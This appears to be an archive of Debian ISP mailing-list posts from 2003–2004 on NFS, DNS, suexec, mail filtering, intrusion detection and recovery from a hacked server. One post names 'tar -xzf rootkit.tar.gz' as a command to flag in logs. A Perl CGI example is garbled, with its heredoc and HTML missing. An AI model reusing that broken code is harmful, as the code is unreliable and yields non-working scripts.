On Sat, 17 Apr 2004, Michelle Konzack wrote in part: >But use a self-compiled Linux with nfs and nfsd compiled WITH >"TCP" and "v3" support. >if you mount your server add "nfsvers=3,tcp" to it otherwise it >will use UDP which is realy not good. Why? from my (maybe wrong?) reading of the docs, the advantage of TCP is that it is hard to spoof given that it is connection oriented. I plan to run NFS on a completely internal network and configure iptables to drop packets from outside the network. The NFS server will not be connected to the outside world and the application servers will have 2 NICs one for the internal Gb/sec 10.0.0.* network and one for the outside world. Andrew Miehs writes in part: > I suggest you all read > http://www.porcupine.org/postfix-mirror/newdoc/NFS_README.html > Especially when it comes to mail. With Maildir you will have less > problems than with mbox, but you still do NOT have atomic transactions, > and as such you will at some stage statistically have a problem. Porcupine says in part: [empathizes added] > switch to maildir style, which needs *no* application-level lock > controls). Other people say: >[DONT USE NFS FOR MAIL OR YOUR PRIVATE PARTS WILL > BE EATEN BY GOLD FISH] See: the spec for maildir http://www.qmail.org/man/man5/maildir.html I can't say I've ever seen a convincing argument against maildir's safety... Am I right in that nobody on the list knows whether or not any advantage to running raiserFS is swallowed by NFS? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
domain registrar recommendation?
Right now most of our domains are registered with register.com, support is good, they provide DNS but... $35 per domain per year is pretty steep. Eventually we'd like to be our own registrar or to use a domain wholesaler like: http://resellers.tucows.com/ >From other lists OpenSRS/tucows seems pretty good but right now we aren't adding 25 domains a year, which is apparently the break even point. Can anyone recommend a registrar? Criteria in order of importance are: 0) Business integrity (no network solutions please) 1) Almost perfect uptime 2) Ease of administration/support 3) price 4) Ease of transferring domains to us when we become a registrar. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
ttysnoop openssh woody
Does anyone have a recipe for getting ttysnoop working with openssh on woody w/o recompiling openssh? This guide: http://64.233.161.104/search?q=cache:ieeFRmtUJ-AJ:www.forty-two.nl/documentation/HOWTOOPENSSHwithTTYSNOOP.pdf+ttysnoop/++ssh+snooptab++login+program&hl=en&lr=lang_en ...will do it but I am too lazy to recompile open ssh. The primary goal is collaberation not spying so I could setup telnet limited to local host & follow the fine man, but this seems an extra step... -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
backup DNS question
We have: ns1.lctc.org ns2.lctc.org ns2.lctc.org is (aparently) down. It is in a locked and alarmed building. How is this effecting users of our DNS? Where in the fine manual is this information? We've looked at the backup DNS chapter of the bind book. We've also a bunch of times done a: dig @host_that_didnt_cached_us domainwehost.org Things look ok, mail is flowing websites are accessed, nobody has complained. Still we feel uneasy... -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
proftpd chroot with mount --bind /source_dir/ /dest_dir/
We don't have per domain accounts we have user accounts with access to web files for various domains. We're looking to chroot user's ftp sessions to their home directory. with a "site" sub directory. something like: / == /home/people/user /sites == /home/sites/ /sites/site_01 == /home/sites/site_01 /sites/site_01 == /home/sites/site_02 chrooting breaks symbolic links The (pretty good) faq at the proftpd site suggests using the mount --bind /source_dir /dest_dir_01 mount --bind /source_dir /dest_dir_02 feature which is available in 2.4 and greater kernels. I'm mildly concerned about how hundreds or thousands of these mounts will effect stability. I'm even more curious about implementation details from people that have done this. Everyone that has access to a site's files is in a group named after the site. btw, despite not making entries in fstab, the (3) mount --bind commands I did survived a reboot, which is curious. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: IDS
> I also want to use something like tripwire to set up file intregity. apt-cache search tripwire apt-cache show aide On Fri, 6 Aug 2004, Tinus Nijmeijers wrote: > I'm looking at securing a new server. > > i'll be using iptables to restrict acces and i want to install SNORT to > watch the network. > I also want to use something like tripwire to set up file intregity. > > however: tripwire seems OLD, last version (2.3.1) is from march 3, 2001 > > i've also seen AIDE mentioned, same thing, aide version 0.10 is from > november 2003 > > is that a problem? > any other apps I should look into concerning file intregity? > > eg: > -samhain > -integrit > -tiger > > any experiences? > > thanks, tinus > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: IDS
On Tue, 10 Aug 2004, Tinus Nijmeijers wrote: > On Fri, 2004-08-06 at 19:57, Dan MacNeil wrote: > > > I also want to use something like tripwire to set up file intregity. > > > > apt-cache search tripwire > > apt-cache show aide > > > I know, and, as I mentioned, they both seem OLD. I believe the version of Aide in the package system is software libre which the current version of tripwire is not. Old != bad. Some projects actually finish, reach maturity. DWhen was the last time the source code for ls was updated ? > can I assume that no-one here uses a file-integrity checker? I do, but in a half assed sloppy useless way. We rebuild our servers from scratch (using a checklist) periodically. The next go around, I'm hoping to pay attention. I keep trying to inch toward actually using aide because it was what allowed debian. It is a pain in the ass, but what motivates me is the knowledge that this year when debian.org and gnu.org were cracked, the problem was discovered by aide. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: How to get hpasm module on HP Proliant?
> Comments, suggestions and especially contributions are welcome! Make the site a Wiki, or at least add a wiki section. Lowers the barrier to contribution a great deal. If you fear vandelism, create a static authoritative section also. 10 minutes work: apt-get install kwiki mkdir cd /var/www/data/cgi-bin/ kwiki-install # optional # paste into htppd.conf: # http://www.perl.com/pub/a/2003/05/14/kwiki.html Alias /kwiki/ kwiki/ > Order allow,deny Allow from all Options ExecCGI FollowSymLinks Indexes AddHandler cgi-script .cgi DirectoryIndex index.cgi ### On Sun, 22 Aug 2004, Markus Oswald wrote: > Am Fr, den 20.08.2004 schrieb Lucas Albers um 20:02: > > > We need a page for debian+hp solutions. I'm sure the information is out > > their, as many debian machines run on hp hardware, but damn if I can track > > it down to one logical location... > > I'm currently working on a website for that: www.debian-on-proliant.com > > Currently there is only a basic framework and a hardware-matrix online, > but I hope to get some real content soon - just haven't had much free > time during the last weeks. > > Comments, suggestions and especially contributions are welcome! > > best regards, > Markus > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Slightly OT: They're forcing me to install Red Hat
I've spent time in both redhat & debian (though mostly in debian) apt-get update ; apt-get upgrade -s ; apt-get upgrade # if OK ...is zero $ up2date # $50 per year per machine. # fewer built in packages If $ is a concern to your boss, then postgres is probably the equal of oracle for most people. Postgres is supported on debian. Another factor, moving from potato to woody was trivial. I **think** the upgrade process for redhat involves fdiskbut this may be different for the $500 enterprise version. On Tue, 17 Jun 2003, Tomàs Núñez Lirola wrote: > WARNING: The following data has NOT been sanitized, to ensure > that the signature remains intact, if valid. Please > be careful if you open any enclosed attachments. > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Hi > My boss is forcing me to install Red Hat. I am the sysad, and I personally > prefer Debian, but it don't seem to be a reason for him. He worries about > Oracle not giving support to Debian users. But we don't have any Oracle > server, he worries for the future. > So, can you give me reasons to convince him to install Debian? I don't know > Red Hat very well, because I've never felt comfortable with it (but this > don't seem to be a reason for anyone :( ). > > Sorry for the slightly OT > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.2.2 (GNU/Linux) > > iD8DBQE+7v9EiQmYUmmD5jgRAmUHAJ0YMXVRz7LChWWo6J0bY1P+6LSNKQCcDRL8 > 0JSPaQOkkk0gH+5xBajs11k= > =c9xv > -END PGP SIGNATURE- > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] >
Re: Frozen Food Delivery Canada
> Must resist urge to call them.. *twitch* Since there is a small chance they are being DOS'd via forgery this would be a good urge to resist. On Wed, 18 Jun 2003, Splash Tekalal wrote: > At 12:26 PM 6/18/2003 -0400, you wrote: > >NORSEMAN CARTAGE LTD. > >2458 HAINES RD > >MISSISSAUGA, ONTARIO, CANADA > >L4Y 1Y6 > >(905)275-0093 > >WWW.NORSEMANCARTAGE.COM > > Must resist urge to call them.. *twitch* > > > > > >
review host based intrusion detection sytems
Doing an apt-cache search on "tripwire" and "intrusion" I came up with these packages: aide bsign fcheck integrit I've googled around a bit but haven't found much evaluation... Does anyone have opinions on them? We're setting up 3 new servers and I want to have an intrusion detection database. Ease of use is much, much more important then perfect security. A while back we installed tripwire from tarball on one system but let it get out of date. At another job, they had a homegrown system that is very cumbersome,--lots and lots of false alarms and a pain to update. Of course it would be extra valuable if you could compare and contrast two or more of these packages.
Re: CGI and PHP Scripts
> (I have tried using suexec as it is installed with the Debian Apache > package, but when I tried to execute a script in a virtual host, not > using the www.domain.com/~username address, it did not execute the > script, saying it was not in the document root. Does anyone know what the default document root is /var/www If you are setting up apache from scratch, I'd use the default as it avoids much hassle w/ suexec. If you want to use a different default docroot you need to recompile suexec For our approach see: http://csl.ltc.org/sys/project.d/suexec.d/install.txt On Tue, 24 Jun 2003, Anand Atreya wrote: > Hi, > > I have just recently begun using Debian and am in the process of > migrating a FreeBSD 4.4 server over to it. This server had many > different users and allowed them to execute CGI and PHP scripts in their > public_html folder (or any folder under it) as their own user, not as > the user of the webserver, using mod_cgiwrap and mod_phpcgiwrap (from > Steven Haryanto). The site where this was located > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists, > and in hindsight, it seems as if mod_cgiwrap was not a very secure > solution to begin with. > Does anybody have any recommendations on how to set up a virtual hosting > Apache server such that users can have CGI and PHP scripts execute as > themselves, without having to put #!/usr/bin/php at the top of php scripts, > and that is completely transparent to the user, also allowing them to place > scripts anywhere in their document root? > (I have tried using suexec as it is installed with the Debian Apache > package, but when I tried to execute a script in a virtual host, not > using the www.domain.com/~username address, it did not execute the > script, saying it was not in the document root. Does anyone know what > the default document root is for the Debian configuration of suexec?) > > Thanks a lot. > -- Anand Atreya >
Re: Server hacked - next...?
chkrootkit is also avaialble through apt-get apt-get install chkrootkit ## On Sun, 29 Jun 2003, Jason Lim wrote: > Hi Russell, > > Well, SE Linux certainly seems like something that needs to be installed. > Most annoying is that all the recent security updates were already done! > > The user CGIs run as the user's UID... suexec. > > > Re-installing from scratch would be a real pain... the server runs on a > 3ware array, and has hundreds of users, all active :-/ > > Is there any way to verify the Integrity of the files somehow, and > download/re-install any binaries that do not match the checksums or > something? Does dpkg or some other Debian tool have this ability? > > If just a list of packages could be shown that do not match what is > actually on the disk, those could be re-downloaded and re-installed, so at > least the system can start working (right now, just typing "gcc" produces > garbage on the screen, no doubt because some libraries have been > replaced). > > Is there any tool that could search the system for root suid scripts (so > the hacker can login again and gain root easily)? > > > Hope you can shed some light on the above, so at least the system can get > back up and running, then we can even setup a new server (with SE Linux > and various others) and migrate the accounts over. > > Thanks in advance!!! > > Sincerely, > Jason > > - Original Message - > From: "Russell Coker" <[EMAIL PROTECTED]> > To: "Jason Lim" <[EMAIL PROTECTED]>; > Sent: 29 June, 2003 4:02 PM > Subject: Re: Server hacked - next...? > > > > On Sun, 29 Jun 2003 17:12, Jason Lim wrote: > > > The box is a very recently updated "stable" box... virtually every > other > > > date apt-get is update/upgrade. > > > > > > The box is setup very secure... the usual things were done... like > > > ensuring no unused services are running and things like that. > > > > > > So does that mean "stable" is actually vulnerable to something we all > > > don't know about??? > > > > That could be the case. > > > > Or it could be some issue of your configuration. Maybe you have Apache > set to > > run customer cgi-bin scripts under the same UID and a customer uploaded > an > > insecure or hostile cgi-bin script. > > > > Have you considered using SE Linux? > > > > -- > > http://www.coker.com.au/selinux/ My NSA Security Enhanced Linux > packages > > http://www.coker.com.au/bonnie++/ Bonnie++ hard drive benchmark > > http://www.coker.com.au/postal/Postal SMTP/POP benchmark > > http://www.coker.com.au/~russell/ My home page > > > > > > >
Re: Anyone running Exim 3.3x + Mysql Virtual users?
I had a similar experience, decided to look at postfix and then never looked back. On Mon, 30 Jun 2003, Dustin Douglas wrote: > I've got the chance to set up a brand new email server for one of our > clients, and being the forward thinking sysadmin that I am, I don't > want to go with the old standby Sendmail, I've got 2 of the beasts > already, and don't want another. > > I've been looking at Exim in Debian Stable and it looks pretty good, > but I'm getting bogged down trying to get everything configured > properly, and I want to give Exim a fair shot. I don't want to give up > on it just because I'm missing something. > > So, anyone have any good pointers to cookbook/HOWTO type docs about > setting up Mysql& Exim with an eye towards virtual users? I've seen > some guides for Exim 4.1x, but Stable uses the older 3.3x line, and > I'd very much like to keep the install as stock as possible. > > Thanks for any pointers... > > Have a good one. > >
Re: Wrapping CGI and PHP Scripts
>Does anyone know what the default document >root is for the Debian configuration of suexec? /var/www/ To change the document root of suexec you need to recompile suexec see: http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt ### On Wed, 2 Jul 2003, Anand Atreya wrote: > Hi, > > I have just recently begun using Debian and am in the process of > migrating a FreeBSD 4.4 server over to it. This server had many different > users and allowed them to execute CGI and PHP scripts in their public_html > folder (or any folder under it) as their own user, not as the user of the > webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven Haryanto). The > site where this was located > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists, and > in hindsight, it seems as if mod_cgiwrap was not a very secure solution to > begin with. > Does anybody have any recommendations on how to set up a virtual hosting > Apache server such that users can have CGI and PHP scripts execute as > themselves, without having to put #!/usr/bin/php at the top of php scripts, > and that is completely transparent to the user, also allowing them to place > scripts anywhere in their document root? > (I have tried using suexec as it is installed with the Debian Apache > package, but when I tried to execute a script in a virtual host, not using > the www.domain.com/~username address, it did not execute the script, saying > it was not in the document root. Does anyone know what the default document > root is for the Debian configuration of suexec?) > > Thanks a lot. > -- Anand Atreya > > >
Re: Wrapping CGI and PHP Scripts
> If only this could be in a configuration file.. What is worse is that every time there is a security patch for apache, we break our hand compiled suexec On Thu, 3 Jul 2003, Jason Lim wrote: > > > > > > >Does anyone know what the default document > > >root is for the Debian configuration of suexec? > > > > /var/www/ > > > > To change the document root of suexec you need to recompile suexec see: > > > > http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt > > > If only this could be in a configuration file.. > > > > > > ### > > On Wed, 2 Jul 2003, Anand Atreya wrote: > > > > > Hi, > > > > > > I have just recently begun using Debian and am in the process of > > > migrating a FreeBSD 4.4 server over to it. This server had many > different > > > users and allowed them to execute CGI and PHP scripts in their > public_html > > > folder (or any folder under it) as their own user, not as the user of > the > > > webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven > Haryanto). The > > > site where this was located > > > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer > exists, and > > > in hindsight, it seems as if mod_cgiwrap was not a very secure > solution to > > > begin with. > > > Does anybody have any recommendations on how to set up a virtual > hosting > > > Apache server such that users can have CGI and PHP scripts execute as > > > themselves, without having to put #!/usr/bin/php at the top of php > scripts, > > > and that is completely transparent to the user, also allowing them to > place > > > scripts anywhere in their document root? > > > (I have tried using suexec as it is installed with the Debian > Apache > > > package, but when I tried to execute a script in a virtual host, not > using > > > the www.domain.com/~username address, it did not execute the script, > saying > > > it was not in the document root. Does anyone know what the default > document > > > root is for the Debian configuration of suexec?) > > > > > > Thanks a lot. > > > -- Anand Atreya > > > > > > > > > > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > > > >
Re: Wrapping CGI and PHP Scripts
We use the shbang... On Wed, 2 Jul 2003, Anand Atreya wrote: > Any recommendations on how to do this with PHP - without needing the > #!/bin/sh > echo DEFANGED.0 > exit > #!/usr/bin/php at the top and without using PHP Safe mode - which is a lame > workaround...? > > -- Anand > > - Original Message - > From: "Dan MacNeil" <[EMAIL PROTECTED]> > To: "Jason Lim" <[EMAIL PROTECTED]> > Cc: "Anand Atreya" <[EMAIL PROTECTED]>; > Sent: Wednesday, July 02, 2003 9:33 PM > Subject: Re: Wrapping CGI and PHP Scripts > > > > > > > If only this could be in a configuration file.. > > > > What is worse is that every time there is a security patch for apache, we > > break our hand compiled suexec > > > > On Thu, 3 Jul 2003, Jason Lim wrote: > > > > > > > > > > > > > > > > >Does anyone know what the default document > > > > >root is for the Debian configuration of suexec? > > > > > > > > /var/www/ > > > > > > > > To change the document root of suexec you need to recompile suexec > see: > > > > > > > > http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt > > > > > > > > > If only this could be in a configuration file.. > > > > > > > > > > > > > > ### > > > > On Wed, 2 Jul 2003, Anand Atreya wrote: > > > > > > > > > Hi, > > > > > > > > > > I have just recently begun using Debian and am in the process of > > > > > migrating a FreeBSD 4.4 server over to it. This server had many > > > different > > > > > users and allowed them to execute CGI and PHP scripts in their > > > public_html > > > > > folder (or any folder under it) as their own user, not as the user > of > > > the > > > > > webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven > > > Haryanto). The > > > > > site where this was located > > > > > (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer > > > exists, and > > > > > in hindsight, it seems as if mod_cgiwrap was not a very secure > > > solution to > > > > > begin with. > > > > > Does anybody have any recommendations on how to set up a virtual > > > hosting > > > > > Apache server such that users can have CGI and PHP scripts execute > as > > > > > themselves, without having to put #!/usr/bin/php at the top of php > > > scripts, > > > > > and that is completely transparent to the user, also allowing them > to > > > place > > > > > scripts anywhere in their document root? > > > > > (I have tried using suexec as it is installed with the Debian > > > Apache > > > > > package, but when I tried to execute a script in a virtual host, not > > > using > > > > > the www.domain.com/~username address, it did not execute the script, > > > saying > > > > > it was not in the document root. Does anyone know what the default > > > document > > > > > root is for the Debian configuration of suexec?) > > > > > > > > > > Thanks a lot. > > > > > -- Anand Atreya > > > > > > > > > > > > > > > > > > > > > > > > > > > -- > > > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > > > with a subject of "unsubscribe". Trouble? Contact > > > [EMAIL PROTECTED] > > > > > > > > > > > > > >
Re: mod_perl and mod_asp
One reason to avoid mod_perl is memory consumption. CGI scripts take up memory only when they are running. --You can have hundreds of CGI scripts on your server. When we moved to mod_perl our apache processes moved from taking about 3M each to about 8M each. With a 100 processes this might be an issue for you. On the other hand if you are running a cgi script more than twice a second, mod_perl is a big win. To answer your question, putting SSL & mode_perl on the same server works fine for us. You might think of separate servers for CGI and mod_perl though. On Fri, 11 Jul 2003, Rod Rodolico wrote: > Ok, this is likely a major stupid question. > > I need mod_asp for my apache 1.3 server. I installed mod_perl and mod_asp > via dselect on my development server, but see no configuration changed in > httpd.conf. I see no sign that mod_perl or mod_asp were installed, and > have discovered no way to see what modules are loaded by an instance of > apache. > > Is mod_perl loaded via some kind of pfm? I have rtfm'd, but haven't seen > anything on the mod_perl v1 being loaded as a module. > > I basically have no clue what is going on here. Is it loaded? Is there a > way to verify it? Or, do I need to add a LoadModule mod_perl entry. I > tried that, but mod_perl was not found in mod_perl.so > > Finally, is there any reason I should not build a mod_perl & mod_ssl > version of apache? I use ssl on some of my sites, and I write a lot of > perl cgi scripts. Currently, my production server has an apache-ssl and a > standard apache server running (two servers), and I need the ability to > run perl on both. I'm thinking I should have only one server, with the > ability to run ssl and perl. Suggestions? > > Thanks > > Rod > >
command logging
For a box that will have limited shell access, I'm looking for something that will log all commands. The sudo log is nice but not everything is run through sudo. There won't be many privacy issues as most users won't have shell. The goal is to review a daily report for anything unexpected: stuff like: tar -xzf rootkit.tar.gz
tracking down i/o sucking process
I'm sure this info is googlable but after 30 minutes I can't find it... I can hear the discs on the server going wild, I run: sar -d 2 120 ...and disc utilization is indeed higher than normal. How do I find what process is driving up the i/o load? the command: top ..is great for CPU & RAM but doesn't do disc...
apt-get bcm5700-module-2.4.18
Two questions: 1) Has anyone done a: apt-get install bcm5700-module-2.4.18 ...with a stock 2.4.18 kernel or otherwise used this driver from without the package system. I would very much like to avoid custom compiling kernels so I can fix any future kernel security holes with apt-get update/upgrade -s/upgrade ? 2) Has anyone gotten different apt-cache search results using the same sources.list on different machines? On machine (A) the broadcom package above shows up, On machine B it does not. sources.list below: # See sources.list(5) for more information deb http://debian.lcs.mit.edu/debian woody main contrib non-free deb http://http.us.debian.org/debian woody main deb http://security.debian.org/ woody/updates main contrib non-free deb http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free # deb http://tiefighter.et.tudelft.nl/~arthur/cvsd ./ # deb-src http://http.us.debian.org/debian testing main contrib non-free deb-src http://debian.lcs.mit.edu/debian woody main contrib non-free deb-src http://http.us.debian.org/debian woody main contrib non-free deb-src http://security.debian.org/ woody/updates main contrib non-free deb-src http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free
Re: Multiple Server routet to one location
All this assumes that you need to ration your dialup time. If not use something like freesco.org to make the connection on demand and use regular smtp/ftp/http etc to allow people remote access to your Strasbourg server(s) > ...and if I collect the Mail in Strasbourg, how can I send it effectif > to Problem-POP's ? uucp is the program/protocol designed to deliver mail over intermittent connections. I believe that from the mid 80s to the mid 90s, a lot of US email traveled over uucp over intermittent dialup lines instead of over smtp over dedicated connections A quick: apt-cache search uucp I did some quick googling... Below is a link to a Sendmail/uucp doc: http://www.fifi.org/doc/HOWTO/en-html/mini/Sendmail+UUCP.html I know you are running courier as your stmp server, but it might help get some general principles established. Getting this to and from port 25 or /var/spool/mail might be the same. As to allowing the remote sites to publish web pages, from experience in rural southeast USA 11 years ago, I'd guess that most people on the short end of a intermitant dial-up connection are most interested in email. Once that is working smoothly, I'd worry about other stuff. The minority that need/want to publish web pages on the full time Internet might get by with emailing them to the hub for a little while. Hope this helps. On Sun, 14 Dec 2003, Michelle Konzack wrote: > Hello, > > I have a small problem with the planning of my CyberCenter: > > In Strasbourg I have a Virtual-Webserver with the 'www' Host and the > 'strasbourg' Host. The internet connectivity is quiet well... > > This Server is in the same time the Router/Firewall and has 3 NIC's. > (external interface, admin-net and public-net with all the Workstations) > > Internal I have a nfs-Server where my Clients have a little Diskspace > (50 MByte) for Web (~/public_html) and Mail (~/Maildir). The Server is > running courier-(imap,mta) and apache. > > Then I have in different villes/countries POP's (other CyberCenters) > which have its own nfs-Servers. > > So I have following public: > > www.ccenter.org Main Web-Server > strasbourg.ccenter.orgnfs/apache/courier-Server where clients have: > E-Mail: [EMAIL PROTECTED] > Web:strasbourg.ccenter.org/~client/ > utopia.ccenter.orgsame as 'strasbourg' > > Now the Problem: > > The internet connectivity is in some locations only V.90 or ISDN, so > Web/Mail-Services are not possible permanently. > > Solution: > > All Web/Mail-Activity is routet via Strasbourg... > > OK, I can poll the Problem-POP's through a squid-cache using wget... > > But HOW ? > > ...and if I collect the Mail in Strasbourg, how can I send it effectif > to Problem-POP's ? > > I was thinking on collecting Mails and put it onto a shttp-cgi, which > tar it up after a wget-request (e.g. all 30 minutes). Then on the > Problem-POP it will decompressed and forward all Messages to procmail... > > Any suggestions ? > > > Thanks > Michelle > > P.S.: The Location is Ercec (Turkey) and Khoy (Iran) and there is > nothing ! > >
Re: Best Practices: CGI.pm & CSS2 ???
CSS is not deprecated. It is not reliable for positioning but it is quite
usable for defining text and character styles. If you have ever
changed all the font tags in a web site, you will be a CSS fan.
If you attempt to validate your HTML against w3.org's validator, you
are required to be a fan.
http://validator.w3.org/
It is probably not a good idea to use CGI.pm to produce HTML output. Why
learn another HTML syntax ? Something like HTML::Template or even a HERE
document will serve you better.
However it is very foolish to **Not** use CGI to parse input from a form.
It is much, much easier and safer than parsing the raw query string or
reading STDIN or escaping shell charactors or otherwise doing the job by
hand.
#!/usr/bin/perl -wT
use strict;
use CGI;
use CGI::Carp;
my $q= new CGI;
my $name = $q->param('first_name') || 0;
my $result =
Hello $name
hello $name
HERE
if ($name) {
print $result;
}
else {
print ;
}
# see perldoc perldata for __DATA__ file handle info
__DATA__
Content-Type: text/html; charset=ISO-8859-1
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>
simple form
Name:
#
On Tue, 30 Dec 2003, Chris Wagner wrote:
> I can tell you some stuff about that right now. CGI.pm is just a quick and
> dirty module that will save on some typing in your perl script. Emphasis on
> some. If you're doing anything more than basic html tags it quickly becomes
> not worth it anymore. Writing tag attributes takes up more time and space
> than just writing out the html itself. The one thing it's really good for
> is writing out tables. If you have an array with all your row data you can
> write something like print Tr( td([EMAIL PROTECTED]) ). That saves a lot of
> typing.
> The perldoc has most of the gritty details.
>
> Cascading Style Sheets. Deprecated. I have seen so many bad uses of style
> sheets it makes me want to cry out in anger. So just don't use them unless
> there's no other way to do it. They are almost guaranteed to cause
> compatibility problems. The problem is that some bonehead writes a style
> sheet that makes a webpage look good on *their* computer. To hell with
> everybody else who doesn't have the same monitor, resolution, fonts,
> browser, etc. The one thing they are "good" for is making themes but be
> careful that it's still ledgible on other machines. I have them turned off
> in my browser.
>
>
> At 10:50 PM 12/29/03 -0600, Michael D Schleif wrote:
> >Please, somebody point me to URL's that provide examples and best
> >practices of using CSS2, CGI.pm and XHTML v1.x.
> >
> >--
> >Best Regards,
>
>
>
>
>
> --
> REMEMBER THE WORLD TRADE CENTER ---=< WTC 911 >=--
> "...ne cede males"
>
> 0100
>
>
>
replacing sanitizer w/ amavisd-new
Right now we use sanitizer (stable package) to call a virus scanner and to strip script,img, style, etc tags We're thinking of switching to amavisd-new (unstable) and clamav (testing) because while sanitizer strips out the virus, it still passes the junk message through. We'd like to be able to drop virus infected messages to the floor. Another (very minor) consideration is that sanitizer is not a daemon and pays a speed penalty every time it is launched. The problem I see looking at the docs is that amavisd-new doesn't strip out potentially evil html. The direction, we're drifting is to run sanitizer after amavisd-new. (I think postfix can run filters in sequence)
Re: replacing sanitizer w/ amavisd-new
Thanks for your discussion. One correction, the muttering about "unsupported methods" is actually from: http://www.postfix.org/addon.html#content which is perhaps slightly more creditable than geocities. Googling around a bit I got this thread with thoughts from one of the main developers (Wietse Venema) http://archives.neohapsis.com/archives/postfix/2003-08/0511.html http://archives.neohapsis.com/archives/postfix/2003-08/0513.html http://archives.neohapsis.com/archives/postfix/2003-08/0514.html http://archives.neohapsis.com/archives/postfix/2003-08/0515.html http://archives.neohapsis.com/archives/postfix/2003-08/0522.html http://archives.neohapsis.com/archives/postfix/2003-08/0595.html [the threading at the archive was not good so I included links to whole thread] I might feel differently if our server was heavily burdened, but the prospect of breaking things with an upgrade to postfix not worth the speed. 3 On Sat, 10 Jan 2004, Michael Loftis wrote: > > > --On Saturday, January 10, 2004 21:53 -0500 Dan MacNeil > <[EMAIL PROTECTED]> wrote: > > > > > Thanks for your reply. > > > >> Might I suggest MailScanner? > > > > You might, some specific problems with amavisd-new that aren't present in > > MailScanner might be even more helpful. > > > > At: > > http://www.geocities.com/scottlhenderson/spamfilter.html > > > > they say: > > > ># mailscanner system, works with Postfix and other MTAs. This > > uses unsupported methods to manipulate Postfix queue files, and there are > > multiple reports of message duplication and/or delivery of truncated > > messages. > > It isn't exactly supported nor unsupportedBasically it relies on the > fact that postfix can be told to use deferred transports on inbound, > automatically forcing everything to go into the deferred queue. You run > one copy of postfix in that mode. Another in a normal mode, minus > smtp/incoming mail. I haven't had any problems with truncated email nor > duplicate deliveries at all with recent-ish Postfix. MAilscanner monitors > the deferred queue, pulling messages out of there and working on them, > putting them into the inbound pickup area on the other postfix instance > after processing. The sytem works well and is quick. > > I don't see how postfix could be responsible for multiple deliveries in > this scenario, nor how mailscanner would cause it. The only time that sort > of thing would happen is for people who don't follow the instructions and > don't put the three queues (mailscanner, inbound postfix, outbound postfix) > on the same partition/filesystem. This is a MUST. mailscanner simply > relinks the files into/out of work areas, this is fast, and atomic, > assuming it's on the same filesystem. Otherwise if it's not the same > filesystem you have to copy to/from staging areas to achieve the atomicity. > > > MailScanner catches about 30% more 'dangerous content' and virii than > amavisd-new given the same virus scanner because MS seems to unpack more > thoroughly/properly. MS supports/integrates the update system of all the > virus scanners it supports negating the need to run a separate update > cronjob all the time. MS supports throttles, amavisd does not, and so MS > will be much nicer to an overloaded/very briskly loaded system than > amavisd. amvisd requires copying the message multiple times, MS reduces > this by using the link/unlink method that all mailservers use nowadays > internally to their queues. > > MS does require running two separate copies of postfix, that amavisd does > not. There's a point for amavis. amavis eliminates unnecesary code from > the resultant script at ./configure time, MailScanner doesn't. That said > though MailScanner seems to work faster on my system. > > Not sure how much else to go on about this. > > -- > Michael Loftis > Modwest Sr. Systems Administrator > Powerful, Affordable Web Hosting >
Re: replacing sanitizer w/ amavisd-new
Thanks for your reply. > Might I suggest MailScanner? You might, some specific problems with amavisd-new that aren't present in MailScanner might be even more helpful. At: http://www.geocities.com/scottlhenderson/spamfilter.html they say: # mailscanner system, works with Postfix and other MTAs. This uses unsupported methods to manipulate Postfix queue files, and there are multiple reports of message duplication and/or delivery of truncated messages. # On Sat, 10 Jan 2004, Michael Loftis wrote: > Might I suggest MailScanner? For me it's been MUCH more reliable and > flexible. In fact I'm gearing up to replace amavisd-new with MailScanner > at work. We've run into some bugs with the latest version (4.24 > specifically), but the verison I'm using on FreeBSD 4.22.5 is solid, and > the version in debian stable 3.13.2 should also be very solid. > > It works with a slew of AV scanners,a nd integrating with one it doesn't > support natively is simple as editing a few files. The thing has about > 1000 some odd settings though so it can be daunting to set up. > > --On Saturday, January 10, 2004 15:12 -0500 Dan MacNeil > <[EMAIL PROTECTED]> wrote: > > > > > Right now we use sanitizer (stable package) to call a virus scanner and to > > strip script,img, style, etc tags > > > > We're thinking of switching to amavisd-new (unstable) and clamav (testing) > > because while sanitizer strips out the virus, it still passes the junk > > message through. We'd like to be able to drop virus infected messages to > > the floor. Another (very minor) consideration is that sanitizer is not a > > daemon and pays a speed penalty every time it is launched. > > > > The problem I see looking at the docs is that amavisd-new doesn't strip > > out potentially evil html. > > > > The direction, we're drifting is to run sanitizer after amavisd-new. (I > > think postfix can run filters in 